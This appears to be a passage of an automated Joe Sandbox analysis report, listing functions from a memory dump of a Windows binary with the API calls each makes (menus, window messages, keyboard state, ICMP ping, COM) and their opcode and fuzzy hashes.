                                                                                                                              Function 001784A6 Relevance: 17.6, APIs: 6, Strings: 4, Instructions: 145COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • __swprintf.LIBCMT ref: 001784E5
                                                                                                                              • __itow.LIBCMT ref: 00178519
                                                                                                                                • Part of subcall function 00192177: _xtow@16.LIBCMT ref: 00192198
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: __itow__swprintf_xtow@16
                                                                                                                              • String ID: %.15g$0x%p$False$True
                                                                                                                              • API String ID: 1502193981-2263619337
                                                                                                                              • Opcode ID: 4c96b6c08b423d88c29a59466a6f87c5de374293ba94a9eb2397decd0a60af87
                                                                                                                              • Instruction ID: 6093cd0a84a367e48842dd7f03b9b93f83512225786b9e81aa65a034c9f38602
                                                                                                                              • Opcode Fuzzy Hash: 4c96b6c08b423d88c29a59466a6f87c5de374293ba94a9eb2397decd0a60af87
                                                                                                                              • Instruction Fuzzy Hash: AA412431604A05ABDF24DB38D845F6A77FABF18304F24846EE44AC7191EB71DA81CB10
                                                                                                                              Function 00195C91 Relevance: 16.8, APIs: 11, Instructions: 257COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 00195CCA
                                                                                                                                • Part of subcall function 0019889E: __getptd_noexit.LIBCMT ref: 0019889E
                                                                                                                              • __gmtime64_s.LIBCMT ref: 00195D63
                                                                                                                              • __gmtime64_s.LIBCMT ref: 00195D99
                                                                                                                              • __gmtime64_s.LIBCMT ref: 00195DB6
                                                                                                                              • __allrem.LIBCMT ref: 00195E0C
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00195E28
                                                                                                                              • __allrem.LIBCMT ref: 00195E3F
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00195E5D
                                                                                                                              • __allrem.LIBCMT ref: 00195E74
                                                                                                                              • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00195E92
                                                                                                                              • __invoke_watson.LIBCMT ref: 00195F03
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Unothrow_t@std@@@__allrem__ehfuncinfo$??2@__gmtime64_s$__getptd_noexit__invoke_watson_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 384356119-0
                                                                                                                              • Opcode ID: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                              • Instruction ID: ee742707be1f715b9ef007aeff11b5f94958bf4421407485eaa39000231a9d54
                                                                                                                              • Opcode Fuzzy Hash: 44019df33dda40162e7ad5693cac5fdd13db5b94ac58de4e6029986730a9c23d
                                                                                                                              • Instruction Fuzzy Hash: E9711A75A01B16ABDF159F7DCC41BAAB3AAAF21724F14413AF814F7681E770DE408B90
                                                                                                                              Function 001B57FB Relevance: 16.7, APIs: 11, Instructions: 189windowsleepCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001B5816
                                                                                                                              • GetMenuItemInfoW.USER32(002318F0,000000FF,00000000,00000030), ref: 001B5877
                                                                                                                              • SetMenuItemInfoW.USER32(002318F0,00000004,00000000,00000030), ref: 001B58AD
                                                                                                                              • Sleep.KERNEL32(000001F4), ref: 001B58BF
                                                                                                                              • GetMenuItemCount.USER32(?), ref: 001B5903
                                                                                                                              • GetMenuItemID.USER32(?,00000000), ref: 001B591F
                                                                                                                              • GetMenuItemID.USER32(?,-00000001), ref: 001B5949
                                                                                                                              • GetMenuItemID.USER32(?,?), ref: 001B598E
                                                                                                                              • CheckMenuRadioItem.USER32(?,00000000,?,00000000,00000400), ref: 001B59D4
                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B59E8
                                                                                                                              • SetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001B5A09
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ItemMenu$Info$CheckCountRadioSleep_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 4176008265-0
                                                                                                                              • Opcode ID: 213cc7101479def36795ab5d58ab2951d0dddaf9ccb1260d61340129b054688b
                                                                                                                              • Instruction ID: c9cabda396de6d98190042cfa4076dd58e7b8ebb191e9e8275e7f550422f2cfd
                                                                                                                              • Opcode Fuzzy Hash: 213cc7101479def36795ab5d58ab2951d0dddaf9ccb1260d61340129b054688b
                                                                                                                              • Instruction Fuzzy Hash: 5961A9B0900689EFDF11CFA5D888BFE7BBAEB05358F180159F842A7261D771AD45CB21
                                                                                                                              Function 001D9A23 Relevance: 16.7, APIs: 11, Instructions: 183windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SendMessageW.USER32(?,0000101F,00000000,00000000), ref: 001D9AA5
                                                                                                                              • SendMessageW.USER32(00000000,?,0000101F,00000000), ref: 001D9AA8
                                                                                                                              • GetWindowLongW.USER32(?,000000F0), ref: 001D9ACC
                                                                                                                              • _memset.LIBCMT ref: 001D9ADD
                                                                                                                              • SendMessageW.USER32(?,00001004,00000000,00000000), ref: 001D9AEF
                                                                                                                              • SendMessageW.USER32(?,0000104D,00000000,00000007), ref: 001D9B67
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$LongWindow_memset
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 830647256-0
                                                                                                                              • Opcode ID: a7da4fecead03a81c8bb7b7607ad82d4af0e610ee741fdc1dda2514a03d0607a
                                                                                                                              • Instruction ID: 25a72cc72f86e2533cce9b36b914dbeb27c61d7e67bc0084f582b750a064164f
                                                                                                                              • Opcode Fuzzy Hash: a7da4fecead03a81c8bb7b7607ad82d4af0e610ee741fdc1dda2514a03d0607a
                                                                                                                              • Instruction Fuzzy Hash: DF616975A00208AFEB11DFA8DC81EEE77F8AF09714F10019AFA18E7392D770A951DB50
                                                                                                                              Function 001B3569 Relevance: 16.6, APIs: 11, Instructions: 119keyboardCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • GetKeyboardState.USER32(?), ref: 001B3591
                                                                                                                              • GetAsyncKeyState.USER32(000000A0), ref: 001B3612
                                                                                                                              • GetKeyState.USER32(000000A0), ref: 001B362D
                                                                                                                              • GetAsyncKeyState.USER32(000000A1), ref: 001B3647
                                                                                                                              • GetKeyState.USER32(000000A1), ref: 001B365C
                                                                                                                              • GetAsyncKeyState.USER32(00000011), ref: 001B3674
                                                                                                                              • GetKeyState.USER32(00000011), ref: 001B3686
                                                                                                                              • GetAsyncKeyState.USER32(00000012), ref: 001B369E
                                                                                                                              • GetKeyState.USER32(00000012), ref: 001B36B0
                                                                                                                              • GetAsyncKeyState.USER32(0000005B), ref: 001B36C8
                                                                                                                              • GetKeyState.USER32(0000005B), ref: 001B36DA
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: State$Async$Keyboard
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 541375521-0
                                                                                                                              • Opcode ID: 7802ac70fbb97a192ad5dc7afcb9628fbc25bf2fea0c19308f8c9ee0bbfc312d
                                                                                                                              • Instruction ID: 54784f6de91e41c33b24c541b0234b37bcd43cbdad33baddfa11b28873002801
                                                                                                                              • Opcode Fuzzy Hash: 7802ac70fbb97a192ad5dc7afcb9628fbc25bf2fea0c19308f8c9ee0bbfc312d
                                                                                                                              • Instruction Fuzzy Hash: 9D41D6709087C97DFF319B6488143F5BFA16B11344F488059D9D6467C2EBA49BE8CBA2
                                                                                                                              Function 001AA28D Relevance: 16.6, APIs: 11, Instructions: 109memoryCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SafeArrayAllocDescriptorEx.OLEAUT32(0000000C,00000000,?), ref: 001AA2AA
                                                                                                                              • SafeArrayAllocData.OLEAUT32(?), ref: 001AA2F5
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001AA307
                                                                                                                              • SafeArrayAccessData.OLEAUT32(?,?), ref: 001AA327
                                                                                                                              • VariantCopy.OLEAUT32(?,?), ref: 001AA36A
                                                                                                                              • SafeArrayUnaccessData.OLEAUT32(?), ref: 001AA37E
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001AA393
                                                                                                                              • SafeArrayDestroyData.OLEAUT32(?), ref: 001AA3A0
                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001AA3A9
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001AA3BB
                                                                                                                              • SafeArrayDestroyDescriptor.OLEAUT32(?), ref: 001AA3C6
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: ArraySafe$DataVariant$DescriptorDestroy$AllocClear$AccessCopyInitUnaccess
                                                                                                                              • String ID:
                                                                                                                              • API String ID: 2706829360-0
                                                                                                                              • Opcode ID: a1bc2e0ff489770c6f0987a5c5c2e10610df96c3b3abc9979f2d0fddcf65ff41
                                                                                                                              • Instruction ID: 89f52d8be4a349483ed0729f69c10d9e315a2d9b17519d3f99c09af4763d0071
                                                                                                                              • Opcode Fuzzy Hash: a1bc2e0ff489770c6f0987a5c5c2e10610df96c3b3abc9979f2d0fddcf65ff41
                                                                                                                              • Instruction Fuzzy Hash: 57414E35900219AFCF01DFA4DC889EEBFB9FF49314F408065F505A3661DB74AA85CBA1
                                                                                                                              Function 001CB250 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 197comCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 001784A6: __swprintf.LIBCMT ref: 001784E5
                                                                                                                                • Part of subcall function 001784A6: __itow.LIBCMT ref: 00178519
                                                                                                                              • CoInitialize.OLE32 ref: 001CB298
                                                                                                                              • CoUninitialize.COMBASE ref: 001CB2A3
                                                                                                                              • CoCreateInstance.COMBASE(?,00000000,00000017,001FD8FC,?), ref: 001CB303
                                                                                                                              • IIDFromString.COMBASE(?,?), ref: 001CB376
                                                                                                                              • VariantInit.OLEAUT32(?), ref: 001CB410
                                                                                                                              • VariantClear.OLEAUT32(?), ref: 001CB471
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Variant$ClearCreateFromInitInitializeInstanceStringUninitialize__itow__swprintf
                                                                                                                              • String ID: Failed to create object$Invalid parameter$NULL Pointer assignment
                                                                                                                              • API String ID: 834269672-1287834457
                                                                                                                              • Opcode ID: 80e221497d4825c2f08f60569f6be236426bc9f9822c5ff793da058976e21a12
                                                                                                                              • Instruction ID: f51a116205723fe44c5fc52b5b14a6ed264ff1ea808240cc5552000999c4cec0
                                                                                                                              • Opcode Fuzzy Hash: 80e221497d4825c2f08f60569f6be236426bc9f9822c5ff793da058976e21a12
                                                                                                                              • Instruction Fuzzy Hash: 21616970208311AFC714DF64D88AF6AB7E8AFA9714F04441DF986DB291D770EE48CB92
                                                                                                                              Function 001C8694 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 163networkfileCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • WSAStartup.WS2_32(00000101,?), ref: 001C86F5
                                                                                                                              • inet_addr.WS2_32(?), ref: 001C873A
                                                                                                                              • gethostbyname.WS2_32(?), ref: 001C8746
                                                                                                                              • IcmpCreateFile.IPHLPAPI ref: 001C8754
                                                                                                                              • IcmpSendEcho.IPHLPAPI(?,?,?,00000005,00000000,?,00000029,00000FA0), ref: 001C87C4
                                                                                                                              • IcmpSendEcho.IPHLPAPI(00000000,00000000,?,00000005,00000000,?,00000029,00000FA0), ref: 001C87DA
                                                                                                                              • IcmpCloseHandle.IPHLPAPI(00000000), ref: 001C884F
                                                                                                                              • WSACleanup.WS2_32 ref: 001C8855
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Icmp$EchoSend$CleanupCloseCreateFileHandleStartupgethostbynameinet_addr
                                                                                                                              • String ID: Ping
                                                                                                                              • API String ID: 1028309954-2246546115
                                                                                                                              • Opcode ID: 02b9760f0969d8030adbe8c59475ec8fb21b6be5952c927415e30d6c552d5b0f
                                                                                                                              • Instruction ID: 4e08eef8f96526b456f42a62eeb19a32bc1d3a7d780dcad810a29819aa1084fa
                                                                                                                              • Opcode Fuzzy Hash: 02b9760f0969d8030adbe8c59475ec8fb21b6be5952c927415e30d6c552d5b0f
                                                                                                                              • Instruction Fuzzy Hash: 3651A131604301AFD710EF64DC85F6ABBE5AF68724F14892DF5569B2A1DB70E841CB41
                                                                                                                              Function 001D9C50 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 105windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • _memset.LIBCMT ref: 001D9C68
                                                                                                                              • CreateMenu.USER32 ref: 001D9C83
                                                                                                                              • SetMenu.USER32(?,00000000), ref: 001D9C92
                                                                                                                              • GetMenuItemInfoW.USER32(?,000000FF,00000000,00000030), ref: 001D9D1F
                                                                                                                              • IsMenu.USER32(?), ref: 001D9D35
                                                                                                                              • CreatePopupMenu.USER32 ref: 001D9D3F
                                                                                                                              • InsertMenuItemW.USER32(?,?,00000001,00000030), ref: 001D9D70
                                                                                                                              • DrawMenuBar.USER32 ref: 001D9D7E
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Menu$CreateItem$DrawInfoInsertPopup_memset
                                                                                                                              • String ID: 0
                                                                                                                              • API String ID: 176399719-4108050209
                                                                                                                              • Opcode ID: f9a1d350a72342317418675575727eb0aa6b1d720f3cf569ce9530f2f24dbea6
                                                                                                                              • Instruction ID: 496bdf5838974c429b6a536e70bd667e5b50c142d075778fe1d916b7749b674b
                                                                                                                              • Opcode Fuzzy Hash: f9a1d350a72342317418675575727eb0aa6b1d720f3cf569ce9530f2f24dbea6
                                                                                                                              • Instruction Fuzzy Hash: B9414B75A00209EFDB14EFA4E884BEA7BF6FF49314F144029E9499B361D734A950DF60
                                                                                                                              Function 001BEC11 Relevance: 15.8, APIs: 4, Strings: 5, Instructions: 97COMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                              • SetErrorMode.KERNEL32(00000001), ref: 001BEC1E
                                                                                                                              • GetDiskFreeSpaceW.KERNEL32(?,?,?,?,?,00000002,00000001), ref: 001BEC94
                                                                                                                              • GetLastError.KERNEL32 ref: 001BEC9E
                                                                                                                              • SetErrorMode.KERNEL32(00000000,READY), ref: 001BED0B
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: Error$Mode$DiskFreeLastSpace
                                                                                                                              • String ID: INVALID$NOTREADY$READONLY$READY$UNKNOWN
                                                                                                                              • API String ID: 4194297153-14809454
                                                                                                                              • Opcode ID: 198c419fb55efd6b6b6206bb0f2203f2ee86a37ab9d797efbf3dba13466ce201
                                                                                                                              • Instruction ID: e3d512263f30cb60249c75d52a12cf89c6088b7e0328468503ea88bb14c23c57
                                                                                                                              • Opcode Fuzzy Hash: 198c419fb55efd6b6b6206bb0f2203f2ee86a37ab9d797efbf3dba13466ce201
                                                                                                                              • Instruction Fuzzy Hash: 8C31CF35A00209AFC705EFA4D949AFEBBF8FF54710F148026F506EB291DB719A41CB91
                                                                                                                              Function 001AC6FD Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 81windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,0000018C,000000FF,00000002), ref: 001AC782
                                                                                                                              • GetDlgCtrlID.USER32 ref: 001AC78D
                                                                                                                              • GetParent.USER32 ref: 001AC7A9
                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 001AC7AC
                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 001AC7B5
                                                                                                                              • GetParent.USER32(?), ref: 001AC7D1
                                                                                                                              • SendMessageW.USER32(00000000,?,?,00000111), ref: 001AC7D4
                                                                                                                              Strings
                                                                                                                              Memory Dump Source
                                                                                                                              • Source File: 00000002.00000002.3410569798.0000000000171000.00000040.00000001.01000000.00000005.sdmp, Offset: 00170000, based on PE: true
                                                                                                                              • Associated: 00000002.00000002.3410439682.0000000000170000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000021E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.000000000022A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.0000000000253000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3410569798.00000000002DC000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411283577.00000000002E2000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              • Associated: 00000002.00000002.3411369787.00000000002E3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                              • Snapshot File: hcaresult_2_2_170000_UNK_.jbxd
                                                                                                                              Similarity
                                                                                                                              • API ID: MessageSend$CtrlParent$_memmove
                                                                                                                              • String ID: ComboBox$ListBox
                                                                                                                              • API String ID: 313823418-1403004172
                                                                                                                              • Opcode ID: 0045c84aaa019ba87eed728a4d6cd4f4a9d51d6ad662ed33a856878cb4d42f12
                                                                                                                              • Instruction ID: dc0dc9c4e2145839186571f74be3ec0c0d65f466a7c4da1d72a993a82f7b413b
                                                                                                                              • Opcode Fuzzy Hash: 0045c84aaa019ba87eed728a4d6cd4f4a9d51d6ad662ed33a856878cb4d42f12
                                                                                                                              • Instruction Fuzzy Hash: 3B21DEB4900208BBCF05ABA4CC82EBEB7BAAB56310F104115F522D72D1DB745859EE60
                                                                                                                              Function 001AC7E6 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 80windowCOMMON
                                                                                                                              Download Yara Rule
                                                                                                                              APIs
                                                                                                                                • Part of subcall function 0017CAEE: _memmove.LIBCMT ref: 0017CB2F
                                                                                                                              • SendMessageW.USER32(?,00000186,00000002,00000000), ref: 001AC869
                                                                                                                              • GetDlgCtrlID.USER32 ref: 001AC874
                                                                                                                              • GetParent.USER32 ref: 001AC890
                                                                                                                              • SendMessageW.USER32(00000000,?,00000111,?), ref: 001AC893
                                                                                                                              • GetDlgCtrlID.USER32(?), ref: 001AC89C
                                                                                                                              • GetParent.USER32(?), ref: 001AC8B8
